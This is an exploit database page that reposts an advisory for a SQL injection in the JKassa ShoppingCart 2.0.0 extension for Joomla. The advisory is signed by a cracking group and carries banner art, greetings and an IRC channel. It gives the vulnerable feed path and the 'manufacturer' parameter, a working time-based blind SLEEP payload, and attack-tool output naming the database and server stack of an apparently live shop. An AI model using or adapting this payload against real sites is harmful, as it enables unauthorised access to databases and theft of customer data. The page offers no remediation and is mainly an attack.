Advertisement






Joomla JKassa ShoppingCart 2.0.0 SQL Injection

CVE Category Price Severity
N/A CWE-89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')) N/A High
Author Risk Exploitation Type Date
N/A High Remote 2022-10-04
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100014

Below is a copy:

Joomla JKassa ShoppingCart 2.0.0 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                      [ Exploits ]                                    

:  Author   : CraCkEr                                                                    :
  Website  : extensions.joomla.org                                                      
  Vendor   : GeneticsPro - jkassa.com                                                   
  Software : Joomla JKassa ShoppingCart 2.0.0                                           
  Vuln Type: SQL Injection                                                              
  Method   : GET                                                                        
  Impact   : Database Access                                                            
                                                                                        

                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise                                                                     
                                                                                        
                                                                                        
                                                                                        

                                                                                      


Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
CryptoJob (Twitter) twitter.com/CryptozJob
   

                                     CraCkEr 2022                                    



Path: /shop/men/sweatshirts.feed

GET parameter 'manufacturer' is vulnerable

---
Parameter: manufacturer (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 7.4.16
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

current database: 'jkassa_umarket'



[-] Done

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.